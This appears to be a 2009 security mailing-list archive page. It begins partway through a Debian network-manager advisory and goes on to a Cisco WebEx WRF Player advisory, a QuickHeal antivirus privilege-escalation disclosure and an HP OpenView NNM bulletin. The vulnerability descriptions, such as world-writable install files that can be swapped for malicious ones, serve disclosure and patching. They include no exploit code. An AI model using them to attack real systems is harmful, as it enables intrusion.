Size/MD5 checksum: 1079499 2d8ec8b17f85ee9aa9c0e04c63b98c3a

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_alpha.deb
Size/MD5 checksum: 381334 d0fa566c6157cc9590fc4ac343494c06
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_alpha.deb
Size/MD5 checksum: 112752 eaccaea2845fbf15eb7785aea488ae23
http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_alpha.deb
Size/MD5 checksum: 259300 2cba0b7225cb0bf54a213b629f8e549c
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_alpha.deb
Size/MD5 checksum: 119400 ac8ae428f79e0643730d648fa785038b
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_alpha.deb
Size/MD5 checksum: 127538 1f191e99e963f25791b788933f92fe67
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_alpha.deb
Size/MD5 checksum: 121702 e00aff6a1ce0de6fde754f8f26bd56cf
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_alpha.deb
Size/MD5 checksum: 136174 4fb472c760ecb83864912cd403d6d68b

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_amd64.deb
Size/MD5 checksum: 377714 346447be8036a69f83dc33f33086535d
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_amd64.deb
Size/MD5 checksum: 118648 242e933e9b2a4a217c26ba938dfec496
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_amd64.deb
Size/MD5 checksum: 127308 c98926309bc01886ea1e617b0ddd234c
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_amd64.deb
Size/MD5 checksum: 124268 f924645be9b503ad97bc66abeb9a0250
http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_amd64.deb
Size/MD5 checksum: 247392 faca3961e48d3ccb07334e741aec10df
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_amd64.deb
Size/MD5 checksum: 111986 9c6fe9dbc9d2185eb702d6ff47398fe7
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_amd64.deb
Size/MD5 checksum: 118352 07be7293e380f38897fdfb3b0d693021

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_hppa.deb
Size/MD5 checksum: 130832 22aa006ddb311666af1b41e63ec17fd4
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_hppa.deb
Size/MD5 checksum: 112826 d4e444ea04ccc770444a6426b792b3c6
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_hppa.deb
Size/MD5 checksum: 125866 fea8d5b15a0c2a94000c0d9b8987499c
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_hppa.deb
Size/MD5 checksum: 120276 372238091d3ab15325f5ad8fee84efd5
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_hppa.deb
Size/MD5 checksum: 376960 860f031ba177fad3524dfbb20118e550
http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_hppa.deb
Size/MD5 checksum: 254374 1835e8ff4f393d3554b566436a2fea57
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_hppa.deb
Size/MD5 checksum: 119536 48e2418b0280423b2e9f69e95b37d643

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_i386.deb
Size/MD5 checksum: 126232 e00655f007c778143f3b33eb2618cf2a
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_i386.deb
Size/MD5 checksum: 118530 d38c510c9e0094529575917272e74b72
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_i386.deb
Size/MD5 checksum: 123882 2c641df7d5ab4f100778795dce5ab9bb
http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_i386.deb
Size/MD5 checksum: 239640 2f6c0940ac4e34ba3aea0c8cbf76cf60
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_i386.deb
Size/MD5 checksum: 118136 f2bae719f42c8a30dcd3b7e8004b8d58
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_i386.deb
Size/MD5 checksum: 112858 1e07c7c7318b89b08f443fcc2fcc4ed1
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_i386.deb
Size/MD5 checksum: 371748 e925bac52eb8fad1bcdf7e14f6dbbc1e

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_ia64.deb
Size/MD5 checksum: 305500 e779cdb25338cd8dc21525022b22768e
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_ia64.deb
Size/MD5 checksum: 407794 6a16b5e4e8563fbad6bd6890bdd7a123
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_ia64.deb
Size/MD5 checksum: 122722 fdcf975b50ed49f4ee37f9f994b94c97
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_ia64.deb
Size/MD5 checksum: 130812 ccae0fa400747a22e3124b8223df51bb
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_ia64.deb
Size/MD5 checksum: 112786 f035e38ad68cf43e32c626d50d781982
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_ia64.deb
Size/MD5 checksum: 122246 6fe88cd1556e1c00755d4509b69f2a52
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_ia64.deb
Size/MD5 checksum: 136392 21529694edab05b38f0a3613768d3509

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_mips.deb
Size/MD5 checksum: 120050 311d3c58e470683d003a764b8cd0f245
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_mips.deb
Size/MD5 checksum: 124602 6534f02f08d137f6e050aa86026b46fd
http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_mips.deb
Size/MD5 checksum: 239920 47d8290298850e325301c7d1ef97048b
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_mips.deb
Size/MD5 checksum: 112790 639962b84ef0f74825f81c0eda9cbbbb
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_mips.deb
Size/MD5 checksum: 131648 fd2e9dc863a688705ea03e47ca55c9fa
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_mips.deb
Size/MD5 checksum: 370762 2e777acfce2d882f54ef92082ea34f09
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_mips.deb
Size/MD5 checksum: 118374 c784f17c138aa7b86454449fe9021dcc

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_powerpc.deb
Size/MD5 checksum: 125372 2edfcaec1df4a4e03b4653aff3012329
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_powerpc.deb
Size/MD5 checksum: 119820 eb0b1dae1c13fa662708ef7391f70266
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_powerpc.deb
Size/MD5 checksum: 112786 946de4230810730fc422b4170779bb38
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_powerpc.deb
Size/MD5 checksum: 368504 c9b07a65e97306f92b70d5ad030b2c5a
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_powerpc.deb
Size/MD5 checksum: 128568 278e2b2cc57991607b9bbf71eeec3a61
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_powerpc.deb
Size/MD5 checksum: 119290 8259e2adda573211e8a0b85c0752a668
http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_powerpc.deb
Size/MD5 checksum: 242784 6fe6a79309ee3c4d95d9b1da16b78ecd

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/n/network-manager/libnm-util-dev_0.6.4-6+etch1_sparc.deb
Size/MD5 checksum: 128288 319084680439c80a2817f3f8606935ac
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib-dev_0.6.4-6+etch1_sparc.deb
Size/MD5 checksum: 118792 a697368a598ad353b8bb00930f5a2c1c
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-dev_0.6.4-6+etch1_sparc.deb
Size/MD5 checksum: 112580 717a8ab6f698873851a5dc586d9000d3
http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1_sparc.deb
Size/MD5 checksum: 234136 05f09b3f9c4dfaab27217a1ca5f7ee4a
http://security.debian.org/pool/updates/main/n/network-manager/libnm-glib0_0.6.4-6+etch1_sparc.deb
Size/MD5 checksum: 118152 abd8acdd835d5d52c1d200c5d6d4f1e7
http://security.debian.org/pool/updates/main/n/network-manager/network-manager-gnome_0.6.4-6+etch1_sparc.deb
Size/MD5 checksum: 369282 40598f43075951ceb3a2af2dbafcda2c
http://security.debian.org/pool/updates/main/n/network-manager/libnm-util0_0.6.4-6+etch1_sparc.deb
Size/MD5 checksum: 124676 9ea075e2ca00fad4d1d390cd23ee847a

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-applet_0.6.6-4+lenny1.dsc
Size/MD5 checksum: 1734 34200f4387757a3688c49c617bc09fc6
http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-applet_0.6.6-4+lenny1.diff.gz
Size/MD5 checksum: 8437 d5c7910fc754ef45eb7628f41e98023f
http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-applet_0.6.6.orig.tar.gz
Size/MD5 checksum: 781511 16e95a3515e4255d034b14045a9effd5

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_alpha.deb
Size/MD5 checksum: 346500 420e6ae0bbf0086e032e05da9c554e6d

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_amd64.deb
Size/MD5 checksum: 337408 38262fc0d2cadaea090e0098f7c24c67

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_hppa.deb
Size/MD5 checksum: 341614 509c38929b6588de102b937fcde5e424

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_i386.deb
Size/MD5 checksum: 331344 993767ed8f55910cced53c641074b338

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_ia64.deb
Size/MD5 checksum: 379256 f662db05a7011e7e9c4ac46c39b960c6

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_mips.deb
Size/MD5 checksum: 331820 5daf0ed1f11f1848b76b5f48b5e771a9

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_mipsel.deb
Size/MD5 checksum: 331298 b2cee8325e9908f7e14aeb455e2ad863

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_powerpc.deb
Size/MD5 checksum: 342226 3b26b9f83aa0c036559f302fb9445fa0

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/n/network-manager-applet/network-manager-gnome_0.6.6-4+lenny1_sparc.deb
Size/MD5 checksum: 329700 3241f8fd438f725f0526cb628251c4ef

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@...
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAkspGFgACgkQ62zWxYk/rQcsCQCgo1tTuda8CU6kM12MCuBtVC5S
Ey4AoKHOiALAwGDJQzqsG85V3HjBl7C5
=9Ta6
-----END PGP SIGNATURE-----

Cisco Security Advisory: Multiple Cisco WebEx WRF Player Vulnerabilities

2009-12-16T08:55:47Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Multiple Cisco WebEx WRF Player Vulnerabilities

Advisory ID: cisco-sa-20091216-webex

http://www.cisco.com/warp/public/707/cisco-sa-20091216-webex.shtml

Revision 1.0

For Public Release 2009 December 16 1600 UTC (GMT)

Summary
=======

Multiple buffer overflow vulnerabilities exist in the Cisco WebEx
Recording Format (WRF) Player. In some cases, exploitation of the
vulnerabilities could allow a remote attacker to execute arbitrary code
on the system of a targeted user.

The Cisco WebEx WRF Player is an application that is used to play back
WebEx meeting recordings that have been recorded on the computer of an
on-line meeting attendee. The WRF Player can be automatically installed
when the user accesses a WRF file that is hosted on a WebEx server. The
WRF Player can also be manually installed for offline playback after
downloading the application from www.webex.com.

If the WRF Player was automatically installed, the WebEx WRF Player
will be automatically upgraded to the latest, non-vulnerable version
when users access a WRF file hosted on a WebEx server. If the WebEx
WRF Player was manually installed, users will need to manually install
a new version of the player after downloading the latest version from
www.webex.com.

Cisco has released free software updates that address these
vulnerabilities.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20091216-webex.shtml.

Affected Products
=================

Vulnerable Products
- -------------------

The vulnerabilities disclosed in this advisory affect the Cisco WebEx
WRF Player. Microsoft Windows, Apple Mac OS X, and Linux versions of the
player are affected. Affected versions of the WRF Player are those prior
to the "first fixed" versions, which are shown in the section "Software
Versions and Fixes" of this advisory.

To check if a Cisco WebEx server is running an affected version of the
WebEx client build, users can log in to their Cisco WebEx server and go
to the Support -> Downloads section. The version of the WebEx client
build will be displayed on the right-hand side of the page under "About
Support Center", for example "Client build: 27.11.0.3328".

There is no way to check if a manually installed version of the WRF
Player is affected by these vulnerabilities. Therefore, Cisco recommends
that users upgrade to the most current version of the player that is
available from http://www.webex.com/downloadplayer.html.

Products Confirmed Not Vulnerable
- ---------------------------------

The Cisco WebEx Player for the WebEx Advanced Recording Format (ARF)
file format is not affected by these vulnerabilities.

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
=======

The WebEx meeting service is a hosted multimedia conferencing solution
that is managed by and maintained by Cisco WebEx. The WebEx Recording
Format (WRF) is a file format that is used to store WebEx meeting
recordings that have been recorded on the computer of an on-line meeting
attendee. The WRF Player is an application that is used to play back
and edit WRF files (files with .wrf extensions). The WRF Player can be
automatically installed when the user accesses a WRF file that is hosted
on a WebEx server (stream playback mode). The WRF Player can also be
manually installed after downloading the application from www.webex.com
to play back WRF files locally (offline playback mode).

Multiple buffer overflow vulnerabilities exist in the WRF Player. The
vulnerabilities may lead to a crash of the WRF Player application, or in
some cases, lead to remote code execution.

To exploit a vulnerability, a malicious WRF file would need to be opened
by the WRF Player application. An attacker may be able to accomplish
this by providing the malicious WRF file directly to users (for example,
via e-mail), or by convincing users to visit a malicious website. The
vulnerability cannot be triggered by users attending a WebEx meeting.

These vulnerabilities have been assigned the following Common
Vulnerabilities and Exposures (CVE) identifiers:

* CVE-2009-2875
* CVE-2009-2876
* CVE-2009-2877
* CVE-2009-2878
* CVE-2009-2879
* CVE-2009-2880

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS
at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

* Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities (all
vulnerabilities in this advisory)

CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete

CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed

Impact
======

Successful exploitation of the vulnerabilities described in this
document could result in a crash of the Cisco WebEx WRF Player
application, and in some cases, allow a remote attacker to execute
arbitrary code on the targeted system with the privileges of the user
running the WRF Player application.

Software Versions and Fixes
===========================

The table below contains "First Fixed" information for the Cisco WebEx
WRF Player that is automatically downloaded from a WebEx site when a WRF
hosted on a WebEx site is accessed (stream playback mode). Fixes are
cumulative within a major release so for example, if release 27.10.1 is
fixed, then release 27.10.2 will have the fix too.

+------------------------------------------------------------+
| Platform | Major Release 26.x | Major Release 27.x |
|-----------+---------------------+--------------------------|
| Microsoft | 26.49.32; available | 27.10.x; available now |
| Windows | now except lockdown | for non-PSO and |
| | sites | non-lockdown sites |
|-----------+---------------------+--------------------------|
| | 26.49.35; available | 27.11.8; available now |
| Mac OS X | early February 2010 | for non-PSO and |
| | | non-lockdown sites |
|-----------+---------------------+--------------------------|
| | 26.49.35; available | 27.11.8; available now |
| Linux | early February 2010 | for non-PSO and |
| | | non-lockdown sites |
+------------------------------------------------------------+

PSO and lockdown sites running 27.x will receive the fixes for these
vulnerabilities during the next emergency patching (EP) cycle. This
advisory will be updated to indicate a specific timeline once one is
available.

If the WRF Player was automatically installed, the WebEx WRF Player will
be automatically upgraded to the latest, non-vulnerable version when
users access a WRF file hosted on a WebEx server.

If the WebEx WRF Player was manually installed, users will need to
manually install a new version of the player after downloading the
latest version from www.webex.com.

Workarounds
===========

There are no workarounds for the vulnerabilities disclosed in this
advisory.

Obtaining Fixed Software
========================

Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt@... or security-alert@... for software
upgrades.

Customers that need additional information can contact WebEx Global
Support Services and Technical Support. WebEx Global Support Services
and Technical Support can be reached through the WebEx support site at
http://support.webex.com/support/support-overview.html or by phone at
+1-866-229-3239 or +1-408-435-7088.

Customers outside of the United States can reference the following link
for local support numbers:

http://support.webex.com/support/phone-numbers.html

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of malicious use of the vulnerabilities
described in this advisory.

These vulnerabilities were discovered and reported to Cisco by Xiaopeng
Zhang and Zhenhua Liu of Fortinet's FortiGuard Labs. The FortiGuard Labs
advisory is available at http://www.fortiguard.com. Cisco would like to
thank FortiGuard Labs for reporting these vulnerabilities to us and for
working with us on a coordinated disclosure.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20091216-webex.shtml

In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.

* cust-security-announce@...
* first-bulletins@...
* bugtraq@...
* vulnwatch@...
* cisco@...
* cisco-nsp@...
* full-disclosure@...
* comp.dcom.sys.cisco@...

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.

Revision History
================

+------------------------------------------------------------+
| Revision 1.0 | 2009-December-16 | Initial public release |
+------------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in
Cisco products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.

+--------------------------------------------------------------------
Copyright 2008-2009 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------

Updated: Dec 16, 2009 Document ID: 110946
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkspCQMACgkQ86n/Gc8U/uCn+QCeLaUWmiHsetXDoJsynUbgsmHs
IDgAnRhmTkrcs2NhAQ7Dq8+eJqofkHSh
=KaHv
-----END PGP SIGNATURE-----

{PRL} QuickHeal antivirus 2010 Local Privilege Escalation

2009-12-16T08:55:33Z

#####################################################################################

Application: QuickHeal antivirus 2010 Local Privilege Escalation

Platforms: Windows Vista SP2

Exploitation: Local Privilege Escalation

Date: 2009-12-16

Author: Francis Provencher (Protek Research Lab's)

#####################################################################################

1) Introduction
2) Technical details
3) The Code (N/A)

#####################################################################################

===============
1) Introduction
===============
QuickHeal antivirus 2010

Quick Heal AntiVirus 2010, with its intuitive and easy-to-use interface, provides hassle-free protection for your system. Once

installed it acts as a shield against viruses, worms, trojans, spywares and other malicious threats. It also provides protection

against new and unknown viruses using Quick Heal's renowned DNAScan technology, and blocks malicious websites. Quick Heal AntiVirus

2010 is very low on resource usage and gives enhanced protection without slowing down your computer.

(from QuickHeal Anti-virus website)

#####################################################################################

============================
2) Technical details
============================

QuickHeal antivirus 2010
Build 11.00 (4.0.0.1)

All files under the install folder have Full control for BUILTIN\users and can be replace with malicious files.

... snip ...

C:\Program Files\Quick Heal\Quick Heal AntiVirus\SCANWSCS.EXE Everyone:(ID)F

... snip ...

#####################################################################################

===========
3) The Code
===========

N\A

#####################################################################################
(PRL-2009-25)

__________________________________________________________________
Looking for the perfect gift? Give the gift of Flickr!

http://www.flickr.com/gift/

[security bulletin] HPSBMA02416 SSRT090008 rev.4 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code

2009-12-16T05:55:57Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01696729
Version: 4

HPSBMA02416 SSRT090008 rev.4 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-03-23
Last Updated: 2009-12-15

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code.

References: CVE-2009-0920, CVE-2009-0921

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, Solaris, and Windows

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2009-0920 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2009-0921 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Oren Isacson of Core Security Technologies for reporting these vulnerabilities to security-alert@....

RESOLUTION

HP has made patches available to resolve the vulnerabilities for NNM v7.53.

HP has made archive files available to resolve the vulnerabilities for NNM v7.01. The archive files are listed in the NNM v7.01 table below. The table also lists required patches. The patches will insure that NNM v7.01 is compatible with the software files in the archive.

The patches are available from http://support.openview.hp.com/selfsolve/patches

Note: The patches are not available from the HP IT Resource Center (ITRC).

OV NNM v7.53

Operating System
Patch

HP-UX (IA)
PHSS_39640 or subsequent

HP-UX (PA)
PHSS_39639 or subsequent

Linux RedHatAS2.1
LXOV_00095 or subsequent

Linux RedHat4AS-x86_64
LXOV_00096 or subsequent

Solaris
PSOV_03520 or subsequent

Windows
NNM_01198 or subsequent

OV NNM v7.51

Upgrade to NNM v7.53 and apply the NNM v7.53 patches listed above.
Patch bundles for upgrading from NNM v7.51 to NNM v7.53 are available using ftp:

Host
Account
Password

ftp.usa.hp.com
nnm_753
Update53

OV NNM v7.01 with Intermediate Patch 12

Operating_System
Required_Patch
Archive_File
SHA-1_Hash_for_Archive_File

HP-UX (PA)
PHSS_38761
SSRT090008.QCCR1B26779.701_IP12.hotfix.tar
ec4e-6b8a-0628-fcc5-d8fa-7147-824d-047b-3034-ea6f

Solaris
PSOV_03516
SSRT090008.QCCR1B26779.701_IP12.hotfix.tar
ec4e-6b8a-0628-fcc5-d8fa-7147-824d-047b-3034-ea6f

Windows
NNM_01194
SSRT090008.QCCR1B26779.701_IP12.hotfix.tar
ec4e-6b8a-0628-fcc5-d8fa-7147-824d-047b-3034-ea6f

The archive files are available using ftp:

Host
Account
Password

ftp.usa.hp.com
sb02416
Secure12

MANUAL ACTIONS: Yes
NNM v7.51 - Update to v7.53 and apply the appropriate patch
NNM v7.01 - Apply the appropriate patch and then apply the archive file

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

For HP-UX OV NNM 7.51 and 7.53
HP-UX B.11.31
HP-UX B.11.23 (IA)
HP-UX B.11.23 (PA)
HP-UX B.11.11
=============
OVNNMgr.OVNNM-RUN,fr=B.07.50.00
action: install the patches listed in the Resolution

For HP-UX OV NNM 7.01
HP-UX B.11.11
=============
OVNNMgr.OVNNM-RUN,fr=B.07.01.00
action: install the patches and archive files listed in the Resolution

END AFFECTED VERSIONS (for HP-UX)

HISTORY
Version:1 (rev.1) - 23 March 2009 Initial release
Version:2 (rev.2) - 31 March 2009 Archive available for NNM v7.53 with Intermediate Patch 22
Version:3 (rev.3) - 6 April 2009 Archive rev.1 available for NNM v7.53 with Intermediate Patch 22
Version:4 (rev.4) - 15 December 2009 Patches available for NNM v7.53, archive files on ftp.usa.hp.com

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@...
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@...
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

